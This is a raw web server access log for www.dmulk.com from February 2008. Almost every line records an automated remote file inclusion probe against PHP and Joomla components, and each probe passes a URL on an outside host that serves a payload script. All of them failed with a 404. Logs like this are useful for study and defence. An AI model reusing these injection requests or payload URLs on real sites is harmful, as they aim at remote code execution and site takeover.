88.86.110.22 - - [17/Feb/2008:08:16:03 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:08:16:38 -0800] "GET /%3Cbug%3Ehttp://checkitoutrenoir.free.fr/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:17:00 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:17:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:17:00 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:17:17 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:17:22 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:17:23 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:17:23 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.16.252.240 - - [17/Feb/2008:08:18:29 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:18:54 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.222 - - [17/Feb/2008:08:18:56 -0800] "GET /tmp/?S=D HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:18:58 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:18:58 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:18:58 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:08:19:38 -0800] "GET /logs/access_080122.log/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:20:12 -0800] "GET /logs/access_080131.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:20:15 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.28.2 - - [17/Feb/2008:08:20:17 -0800] "GET /account.php?action=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:21:08 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:21:34 -0800] "GET /logs/access_080118.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:08:21:35 -0800] "GET /index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.16.252.240 - - [17/Feb/2008:08:21:36 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:21:40 -0800] "GET /logs/access_080126.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:22:05 -0800] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [17/Feb/2008:08:23:04 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://odasaja.com/v1/secure/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:08:23:25 -0800] "GET /logs/access_080117.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:23:37 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:23:39 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:23:39 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:23:40 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:23:43 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:23:44 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:24:06 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.120.52 - - [17/Feb/2008:08:26:51 -0800] "GET /config.inc.php?path_escape=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.16.252.240 - - [17/Feb/2008:08:27:18 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.16.252.240 - - [17/Feb/2008:08:27:19 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [17/Feb/2008:08:27:30 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [17/Feb/2008:08:27:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [17/Feb/2008:08:27:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.13 - - [17/Feb/2008:08:28:08 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.185.20.38 - - [17/Feb/2008:08:28:46 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
218.185.20.38 - - [17/Feb/2008:08:28:47 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:08:29:14 -0800] "GET /logs/access_080106.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.120.52 - - [17/Feb/2008:08:29:44 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.120.52 - - [17/Feb/2008:08:29:44 -0800] "GET /config.inc.php?path_escape=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.120.52 - - [17/Feb/2008:08:29:44 -0800] "GET /logs/config.inc.php?path_escape=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:08:30:05 -0800] "GET /logs/access_080130.log/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:08:30:05 -0800] "GET /logs/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:08:30:26 -0800] "GET /index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:08:32:26 -0800] "GET /logs/access_080120.log/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:08:32:27 -0800] "GET /logs/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:08:32:30 -0800] "GET /logs/access_080122.log/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:08:34:03 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.59.155.2 - - [17/Feb/2008:08:34:39 -0800] "GET /logs/access_080106.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:34:53 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:34:53 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:34:54 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:08:35:07 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:08:35:07 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:08:35:08 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:08:35:10 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:08:35:10 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:08:35:10 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.3.255.10 - - [17/Feb/2008:08:35:14 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.3.255.10 - - [17/Feb/2008:08:35:14 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.3.255.10 - - [17/Feb/2008:08:35:16 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:08:35:17 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:08:35:17 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:08:35:17 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:35:48 -0800] "GET /logs/access_080201.log//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:08:36:19 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:36:49 -0800] "GET /logs/access_080122.log//oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:36:49 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:36:50 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:36:50 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:36:50 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:36:50 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
72.9.159.213 - - [17/Feb/2008:08:37:35 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:08:37:52 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:08:38:02 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:38:02 -0800] "GET /logs/access_071225.log//oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:08:38:02 -0800] "GET /logs/access_071225.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:38:22 -0800] "GET /logs/access_080117.log///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:08:39:35 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:08:39:35 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:08:39:35 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:08:39:42 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:08:39:42 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:08:39:42 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.3.255.10 - - [17/Feb/2008:08:39:42 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.252.91.7 - - [17/Feb/2008:08:39:53 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [17/Feb/2008:08:39:54 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [17/Feb/2008:08:39:54 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [17/Feb/2008:08:40:21 -0800] "GET /logs/access_080117.log//login.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [17/Feb/2008:08:40:22 -0800] "GET //login.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [17/Feb/2008:08:40:22 -0800] "GET /logs//login.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:41:50 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:41:51 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:41:52 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:42:16 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:42:16 -0800] "GET //skin/zero_vote/error.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:42:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:43:12 -0800] "GET /logs/access_080117.log//login.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [17/Feb/2008:08:43:12 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
